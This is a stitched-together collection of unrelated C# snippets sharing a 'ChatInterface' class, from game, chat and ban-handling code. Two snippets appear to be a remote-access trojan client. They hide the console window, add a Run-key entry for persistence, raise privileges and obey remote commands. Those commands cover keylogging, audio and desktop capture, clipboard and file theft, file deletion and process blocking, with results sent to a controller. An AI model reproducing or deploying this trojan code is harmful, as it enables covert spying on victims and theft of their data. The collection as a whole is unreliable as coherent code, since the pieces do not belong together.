public ChatApiController() { userService = new UserRepository(); chatService = new ChatRepository(); messageService = new MessageRepository(); chatRequestService = new ChatRequestRepository(); this.eventService = new EventService(); }
private void TakeScreenshot() { var path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile), ".truecraft", "screenshots", DateTime.Now.ToString("") + ".png"); if (!Directory.Exists(Path.GetDirectoryName(path))) { Directory.CreateDirectory(Path.GetDirectoryName(path)); } using (var stream = File.OpenWrite(path)) new PngWriter().Write(RenderTarget, stream); ChatInterface.AddMessage(string.Format("Screenshot saved as {0}", Path.GetFileName(path))); }
//Check settings and start connect private static void Main(string[] args) { UpdateInterval = Convert.ToInt16(ClientSettings.UpdateInterval); var handle = GetConsoleWindow(); ShowWindow(handle, SW_HIDE); FreeConsole(); ShowWindow(handle, SW_SHOW); EnableVisualStyles(); CI = new ChatInterface(); if (ClientSettings.Install == "True" && !IsInstalled()) { if (!IsAdmin()) { RaisePerms(); } if (!IsInstalled()) { File.Copy(ExecutablePath, InstallDirectory, true); Process.Start(InstallDirectory); Environment.Exit(0); } else { if (ClientSettings.Startup == "True") { RegistryKey RK = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); try { RK.DeleteValue("VCLIENT", false); } catch { } try { RK.SetValue("VCLIENT", ExecutablePath); } catch { } } } } Connect(); Console.ReadKey(); }
private static void CloseChatForm() { try { ChatThread.Abort(); Thread.Sleep(100); ChatThread = new Thread(OpenChatForm); CI = new ChatInterface(); } catch { List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification type ToSend.AddRange(Encoding.ASCII.GetBytes("The clients chat could not be closed. Try again.")); Networking.MainClient.Send(ToSend.ToArray()); } }
public void updateOnThisClientExit() { removeAsEventListener(); List <string> channelsIdKeys = new List <string>(channelsMap.Keys); foreach (string key in channelsIdKeys) { Channel ch = channelsMap[key]; channelsMap.Remove(ch.getName()); ChatInterface chatInterface = getChatInterface(); if (chatInterface != null) { chatInterface.onChannelLeave(ch); } } }
protected override void LoadContent() { // Ensure we have default textures loaded. TextureMapper.LoadDefaults(GraphicsDevice); // Load any custom textures if needed. TextureMapper = new TextureMapper(GraphicsDevice); if (UserSettings.Local.SelectedTexturePack != TexturePack.Default.Name) { TextureMapper.AddTexturePack(TexturePack.FromArchive(Path.Combine(TexturePack.TexturePackPath, UserSettings.Local.SelectedTexturePack))); } Pixel = new FontRenderer( new Font(Content, "Fonts/Pixel", FontStyle.Regular), new Font(Content, "Fonts/Pixel", FontStyle.Bold), null, // No support for underlined or strikethrough yet. The FontRenderer will revert to using the regular font style. null, // (I don't think BMFont has those options?) new Font(Content, "Fonts/Pixel", FontStyle.Italic)); Interfaces.Add(ChatInterface = new ChatInterface(Client, KeyboardComponent, Pixel)); Interfaces.Add(DebugInterface = new DebugInterface(Client, Pixel)); ChatInterface.IsVisible = true; DebugInterface.IsVisible = true; OpaqueEffect = new BasicEffect(GraphicsDevice); OpaqueEffect.EnableDefaultLighting(); OpaqueEffect.DirectionalLight0.SpecularColor = Color.Black.ToVector3(); OpaqueEffect.DirectionalLight1.SpecularColor = Color.Black.ToVector3(); OpaqueEffect.DirectionalLight2.SpecularColor = Color.Black.ToVector3(); OpaqueEffect.TextureEnabled = true; OpaqueEffect.Texture = TextureMapper.GetTexture("terrain.png"); OpaqueEffect.FogEnabled = true; OpaqueEffect.FogStart = 512f; OpaqueEffect.FogEnd = 1000f; OpaqueEffect.FogColor = Color.CornflowerBlue.ToVector3(); OpaqueEffect.VertexColorEnabled = true; TransparentEffect = new AlphaTestEffect(GraphicsDevice); TransparentEffect.AlphaFunction = CompareFunction.Greater; TransparentEffect.ReferenceAlpha = 127; TransparentEffect.Texture = TextureMapper.GetTexture("terrain.png"); TransparentEffect.VertexColorEnabled = true; base.LoadContent(); }
static void Main(string[] args) { Console.WriteLine("Enter your name"); var name = Console.ReadLine(); var chatClient = new MqttChatClient(name); var userInterface = new ChatInterface(); var configuration = new ClientConfiguration() { ClientId = "Client_" + name, Host = "localhost", Port = 1883, KeepAlivePeriod = 50000, CommunicationTimeout = 50000 }; IChatService chatService = new ChatService(userInterface, chatClient, configuration); chatService.Start(); }
public AccountController() { chatService = new ChatRepository(); }
/// <summary> /// Call this whenever the report command is fired. This will handle reporting, logging, and banning. /// </summary> /// <param name="data">The command data.</param> /// <param name="source">The source of the report.</param> public void HandleReport(string data, IPlayerChatEvent source) { if (data.Count(x => x == "'"[0]) != 2) { ChatInterface.SafeMultiMessage(source.Game, "Invalid format. Please use : \"/report hacking Player's name 'Describe the cheat here'\"!", Structures.BroadcastType.Error, "(server/private)", source.ClientPlayer); return; } if (data.StartsWith("hacking ")) { data = data.Remove(0, 8); int pFrom = data.IndexOf("'", StringComparison.InvariantCultureIgnoreCase) + 1; int pTo = data.LastIndexOf("'", StringComparison.CurrentCultureIgnoreCase); var message = data.Substring(pFrom, pTo - pFrom); data = new string(data.Take(pFrom - 2 /*we need to remove the ' and the space.*/).ToArray()); foreach (var client in source.Game.Players) { if (client.Character.PlayerInfo.PlayerName.Equals(data)) { lock (IpReports) { bool updated = false; for (int i = 0; i < IpReports.Count; i++) { if (IpReports[i].Target.Equals(client.Client.Connection.EndPoint.Address.ToString())) { updated = true; if (IpReports[i].TotalReports >= ReportsPerBan) { client.BanAsync(); AddPermBan(IpReports[i]); IpReports.Remove(IpReports[i]); ChatInterface.SafeMultiMessage(source.Game, $"\"{client.Character.PlayerInfo.PlayerName}\" has been permanently banned.", Structures.BroadcastType.Warning); } else { lock (IpReports) { updated = true; if (!IpReports[i].Sources.Contains(source.ClientPlayer.Client .Connection.EndPoint.Address.ToString())) { IpReports[i].TotalReports += 1; IpReports[i].Messages.Add(message); IpReports[i].Sources.Add(source.ClientPlayer.Client .Connection .EndPoint.Address.ToString()); ChatInterface.SafeMultiMessage(source.Game, $"Your report has been filed successfully. The offender has {IpReports[i].TotalReports} complaints now.", Structures.BroadcastType.Information, "(server complaints/private)", source.ClientPlayer); } else { ChatInterface.SafeMultiMessage(source.Game, $"You cannot report the offender again. He will be taken care of.", Structures.BroadcastType.Error, "(server/error/private)", source.ClientPlayer); } } } } } if (!updated) { var report = new JusticeSystem.Report { TargetName = client.Character.PlayerInfo.PlayerName, TotalReports = 1, Target = client.Client.Connection.EndPoint.Address.ToString(), Sources = new List <string>() }; report.Sources.Add(source.ClientPlayer.Client.Connection.EndPoint.Address.ToString()); lock (IpReports) IpReports.Add(report); ChatInterface.SafeMultiMessage(source.Game, $"A criminal record has been created for {client.Character.PlayerInfo.PlayerName}!", Structures.BroadcastType.Information, "(server complaints/private)", source.ClientPlayer); } } return; } } ChatInterface.SafeMultiMessage(source.Game, "Could not find player", Structures.BroadcastType.Warning, "(server/warn)", source.ClientPlayer); } }
// Start is called before the first frame update void Start() { chatInterface = FindObjectOfType <ChatInterface>(); player = FindObjectOfType <PlayerController>(); }
static void Main(string[] args) //If you run this with the argument '', it'll use that as the server address to connect to. { Console.WriteLine("Welcome to the Group 2 Chat Client!"); Console.WriteLine("\n Enter your client ID."); string clientID = Console.ReadLine(); Console.WriteLine("\n Enter your client password."); string password = Console.ReadLine(); string serverIP = ""; if (args.Length == 0) //If the console has not accepted any arguments, ask for the IP. { Console.WriteLine("\n Please enter the IP address of the server. (Example:"); serverIP = Console.ReadLine(); } else { serverIP = args[0]; } UDPConnection udpConnection = new UDPConnection(clientID, password, serverIP); string response = udpConnection.UDPConnect(); if (response.Equals("FAIL")) { Console.ReadKey(); Main(args); } int[] cookie_port = UDPConnection.udpParse(response); TCPConnection tcpConnection = new TCPConnection(cookie_port[0], new IPEndPoint(IPAddress.Parse(serverIP), cookie_port[1]), udpConnection.privateKeyCipher); bool connected = tcpConnection.TCPConnect(); if (!connected) { } string chatPartner = null; int sessionID = 0; State state = State.None; bool running = true; Queue <string> queue = new Queue <string>(); ChatInterface chatInterface = new ChatInterface(Console.WindowWidth, Console.WindowHeight); Console.Clear(); chatInterface.PushMessage(string.Format("Connected to server as: {0}", clientID)); Thread listenThread = new Thread(() => { try { while (running) { string message = tcpConnection.receive(); lock (queue) { queue.Enqueue(message); } } } catch (SocketException) { Console.Clear(); Console.WriteLine("Logged off"); } }); listenThread.Start(); while (true) { Thread.Sleep(20); lock (queue) { while (queue.Count > 0) { string serverMessage = queue.Dequeue(); string[] tokens = serverMessage.Split(' '); if (tokens[0] == "UNREACHABLE") { Console.WriteLine("{0} is unreachable", tokens[1]); } else if (tokens[0] == "CHAT_STARTED") { sessionID = int.Parse(tokens[1]); chatPartner = tokens[2]; state = State.Chatting; chatInterface.PushMessage(string.Format("Connected to {0}", tokens[2])); } else if (tokens[0] == "END_NOTIF") { state = State.None; chatInterface.PushMessage(string.Format("Chat ended with {0}", chatPartner)); chatPartner = null; } else if (tokens[0] == "HISTORY") { string[] history = serverMessage.Substring(8).Split(new string[] { "\r\n" }, StringSplitOptions.RemoveEmptyEntries); foreach (var line in history) { chatInterface.PushMessage(line); } } else { chatInterface.PushMessage(stringSplit(serverMessage)[1]); } } } string input = chatInterface.Update(); if (input == null) { continue; } if (state == State.None) { string[] tokens = input.Split(' '); if (tokens[0] == "chat") { tcpConnection.send(input); } else if (tokens[0] == "logoff") { running = false; tcpConnection.Terminate(); break; } else if (tokens[0] == "history") { tcpConnection.send(input); } else { chatInterface.PushMessage("Unrecognized command"); } } else if (state == State.Chatting) { if (input == "endchat") { tcpConnection.send("END_REQUEST"); } else { tcpConnection.send(string.Format("CHAT {0}", input)); } } if (!running) { break; } } listenThread.Join(); }
private static void HandleData(byte[] RawData) { if (ReceivingFile) { try { File.WriteAllBytes(FileToWrite, RawData); string Directory = CurrentDirectory; if (Directory.Equals("BaseDirectory")) { Directory = Path.GetPathRoot(Environment.SystemDirectory); } string Files = string.Empty; DirectoryInfo DI = new DirectoryInfo(Directory); foreach (var F in DI.GetDirectories()) { Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]"; } foreach (FileInfo F in DI.GetFiles()) { Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" + F.CreationTime + "]"; } List <byte> ToSend = new List <byte>(); ToSend.Add(5); //File List Type ToSend.AddRange(Encoding.ASCII.GetBytes(Files)); Networking.MainClient.Send(ToSend.ToArray()); ToSend.Clear(); ToSend.Add(1); //Notification Type ToSend.AddRange( Encoding.ASCII.GetBytes("The file " + Path.GetFileName(FileToWrite) + " was uploaded.")); Networking.MainClient.Send(ToSend.ToArray()); } catch { } ReceivingFile = false; return; } string StringForm = string.Empty; try { StringForm = Encoding.ASCII.GetString(RawData); Console.WriteLine("Command Recieved From " + ClientSettings.DNS + " (" + StringForm + ")"); } catch { } if (StringForm == "KillClient") { if (ChatThread.ThreadState == ThreadState.Running) { CloseChatForm(); } UninstallClient(); try { Process.GetCurrentProcess().Kill(); } catch { Environment.Exit(0); } } else if (StringForm == "DisconnectClient") { Networking.MainClient.Disconnect(); } else if (StringForm == "ShowClientConsole") { var handle = GetConsoleWindow(); ShowWindow(handle, SW_SHOW); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Console has been shown to client.")); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Contains("MsgBox")) { string ToBreak = GetSubstringByString("(", ")", StringForm); string Text = GetSubstringByString("<", ">", ToBreak); string Header = GetSubstringByString("[", "]", ToBreak); string ButtonString = GetSubstringByString("{", "}", ToBreak); string IconString = GetSubstringByString("/", @"\", ToBreak); MessageBoxButtons MBB = MessageBoxButtons.OK; MessageBoxIcon MBI = MessageBoxIcon.None; #region Button & Icon conditional statements if (ButtonString.Equals("Abort Retry Ignore")) { MBB = MessageBoxButtons.AbortRetryIgnore; } else if (ButtonString.Equals("OK")) { MBB = MessageBoxButtons.OK; } else if (ButtonString.Equals("OK Cancel")) { MBB = MessageBoxButtons.OKCancel; } else if (ButtonString.Equals("Retry Cancel")) { MBB = MessageBoxButtons.RetryCancel; } else if (ButtonString.Equals("Yes No")) { MBB = MessageBoxButtons.YesNo; } else if (ButtonString.Equals("Yes No Cancel")) { MBB = MessageBoxButtons.YesNoCancel; } if (IconString.Equals("Asterisk")) { MBI = MessageBoxIcon.Asterisk; } else if (IconString.Equals("Error")) { MBI = MessageBoxIcon.Error; } else if (IconString.Equals("Exclamation")) { MBI = MessageBoxIcon.Exclamation; } else if (IconString.Equals("Hand")) { MBI = MessageBoxIcon.Hand; } else if (IconString.Equals("Information")) { MBI = MessageBoxIcon.Information; } else if (IconString.Equals("None")) { MBI = MessageBoxIcon.None; } else if (IconString.Equals("Question")) { MBI = MessageBoxIcon.Question; } else if (IconString.Equals("Stop")) { MBI = MessageBoxIcon.Stop; } else if (IconString.Equals("Warning")) { MBI = MessageBoxIcon.Warning; } #endregion Button & Icon conditional statements MessageBox.Show(Text, Header, MBB, MBI); } else if (StringForm.Equals("StartRD")) { RemoteDesktopStream.Start(); } else if (StringForm.Equals("StopRD")) { RemoteDesktopStream.Stop(); } else if (StringForm.Equals("GetProcesses")) { Process[] PL = Process.GetProcesses(); List <string> ProcessList = new List <string>(); foreach (Process P in PL) { ProcessList.Add("{" + P.ProcessName + "}<" + P.Id + ">[" + P.MainWindowTitle + "]"); } string[] StringArray = ProcessList.ToArray <string>(); List <byte> ToSend = new List <byte>(); ToSend.Add(3); //Process List Type string ListString = ""; foreach (string Process in StringArray) { ListString += "][" + Process; } ToSend.AddRange(Encoding.ASCII.GetBytes(ListString)); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Contains("EndProcess(")) { string ToEnd = GetSubstringByString("(", ")", StringForm); try { Process P = Process.GetProcessById(Convert.ToInt16(ToEnd)); string Name = P.ProcessName; P.Kill(); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("The process " + P.ProcessName + " was killed.")); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("OpenWebsite(")) { string ToOpen = GetSubstringByString("(", ")", StringForm); try { Process.Start(ToOpen); } catch { } List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("The website " + ToOpen + " was opened.")); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Equals("GetComputerInfo")) { string ListString = ""; List <string> ComputerInfoList = new List <string>(); ComputerInfo.GetGeoInfo(); ComputerInfoList.Add("Computer Name: " + ComputerInfo.GetName()); ComputerInfoList.Add("Computer CPU: " + ComputerInfo.GetCPU()); ComputerInfoList.Add("Computer GPU: " + ComputerInfo.GetGPU()); ComputerInfoList.Add("Computer Ram Amount (MB): " + ComputerInfo.GetRamAmount()); ComputerInfoList.Add("Computer Antivirus: " + ComputerInfo.GetAntivirus()); ComputerInfoList.Add("Computer OS: " + ComputerInfo.GetWindowsVersion()); ComputerInfoList.Add("Country: " + ComputerInfo.GeoInfo.Country); ComputerInfoList.Add("Region Name: " + ComputerInfo.GeoInfo.RegionName); ComputerInfoList.Add("City: " + ComputerInfo.GeoInfo.City); foreach (string Info in ComputerInfoList.ToArray()) { ListString += "," + Info; } List <byte> ToSend = new List <byte>(); ToSend.Add(4); //Information Type ToSend.AddRange(Encoding.ASCII.GetBytes(ListString)); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Equals("RaisePerms")) { Process P = new Process(); P.StartInfo.FileName = ExecutablePath; P.StartInfo.UseShellExecute = true; P.StartInfo.Verb = "runas"; List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Client is restarting in administration mode.")); P.Start(); Networking.MainClient.Send(ToSend.ToArray()); Environment.Exit(0); } else if (StringForm.Contains("GetDF{")) { try { string Directory = GetSubstringByString("{", "}", StringForm); if (Directory.Equals("BaseDirectory")) { Directory = Path.GetPathRoot(Environment.SystemDirectory); } string Files = string.Empty; DirectoryInfo DI = new DirectoryInfo(Directory); foreach (var F in DI.GetDirectories()) { Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]"; } foreach (FileInfo F in DI.GetFiles()) { Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" + F.CreationTime + "]"; } List <byte> ToSend = new List <byte>(); ToSend.Add(5); //File List Type ToSend.AddRange(Encoding.ASCII.GetBytes(Files)); Networking.MainClient.Send(ToSend.ToArray()); CurrentDirectory = Directory; ToSend.Clear(); ToSend.Add(6); //Current Directory Type ToSend.AddRange(Encoding.ASCII.GetBytes(CurrentDirectory)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("GoUpDir")) { try { List <byte> ToSend = new List <byte>(); ToSend.Add(7); //Directory Up Type CurrentDirectory = Directory.GetParent(CurrentDirectory).ToString(); ToSend.AddRange(Encoding.ASCII.GetBytes(CurrentDirectory)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("GetFile")) { try { string FileString = GetSubstringByString("{", "}", StringForm); byte[] FileBytes; using (FileStream FS = new FileStream(FileString, FileMode.Open)) { FileBytes = new byte[FS.Length]; FS.Read(FileBytes, 0, FileBytes.Length); } List <byte> ToSend = new List <byte>(); ToSend.Add(8); //File Type ToSend.AddRange(FileBytes); Networking.MainClient.Send(ToSend.ToArray()); } catch (Exception EX) { List <byte> ToSend = new List <byte>(); ToSend.Add(1); ToSend.AddRange(Encoding.ASCII.GetBytes("Error Downloading: " + EX.Message + ")")); Networking.MainClient.Send(ToSend.ToArray()); } } else if (StringForm.Contains("StartFileReceive{")) { try { FileToWrite = GetSubstringByString("{", "}", StringForm); var Stream = File.Create(FileToWrite); Stream.Close(); ReceivingFile = true; } catch { } } else if (StringForm.Contains("TryOpen{")) { string ToOpen = GetSubstringByString("{", "}", StringForm); try { Process.Start(ToOpen); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("The file " + Path.GetFileName(ToOpen) + " was opened.")); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("DeleteFile{")) { try { string ToDelete = GetSubstringByString("{", "}", StringForm); File.Delete(ToDelete); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange( Encoding.ASCII.GetBytes("The file " + Path.GetFileName(ToDelete) + " was deleted.")); Networking.MainClient.Send(ToSend.ToArray()); string Directory = CurrentDirectory; if (Directory.Equals("BaseDirectory")) { Directory = Path.GetPathRoot(Environment.SystemDirectory); } string Files = string.Empty; DirectoryInfo DI = new DirectoryInfo(Directory); foreach (var F in DI.GetDirectories()) { Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]"; } foreach (FileInfo F in DI.GetFiles()) { Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" + F.CreationTime + "]"; } ToSend.Clear(); ToSend.Add(5); //File List Type ToSend.AddRange(Encoding.ASCII.GetBytes(Files)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Equals("GetClipboard")) { try { string ClipboardText = "Clipboard is empty or contains an invalid data type."; Thread STAThread = new Thread( delegate() { if (Clipboard.ContainsText(TextDataFormat.Text)) { ClipboardText = Clipboard.GetText(TextDataFormat.Text); } }); STAThread.SetApartmentState(ApartmentState.STA); STAThread.Start(); STAThread.Join(); List <byte> ToSend = new List <byte>(); ToSend.Add(9); //Clipboard Text Type ToSend.AddRange(Encoding.ASCII.GetBytes(ClipboardText)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Equals("StartUsageStream")) { HardwareUsageStream.Start(); } else if (StringForm.Equals("StopUsageStream")) { HardwareUsageStream.Stop(); } else if (StringForm.Equals("StartKL")) { KeyloggerStream.Start(); } else if (StringForm.Equals("StopKL")) { KeyloggerStream.Stop(); } else if (StringForm.Equals("StartAR")) { if (!ARActive) { RecordAudio(); } } else if (StringForm.Equals("StopAR")) { if (ARActive) { StopRecordAudio(); } } else if (StringForm.Equals("OpenChat")) { if (!CActive) { CActive = true; CI = new ChatInterface(); ChatThread.Start(); } } else if (StringForm.Equals("CloseChat")) { if (CActive) { CActive = false; Networking.ChatClosing = true; Thread.Sleep(200); CloseChatForm(); } } else if (StringForm.Contains("[<MESSAGE>]")) { Networking.CurrentMessage = StringForm.Replace("[<MESSAGE>]", ""); } else if (StringForm.Equals("ToggleAntiProcess")) { if (!APDisabled) { APDisabled = true; AntiProcess.StartBlock(); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Started Anti-Process.")); Networking.MainClient.Send(ToSend.ToArray()); } else if (APDisabled) { APDisabled = false; AntiProcess.StopBlock(); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Stopped Anti-Process.")); Networking.MainClient.Send(ToSend.ToArray()); } } }
public void setChatInterface(ChatInterface chatInterface) { this.chatInterface = chatInterface; }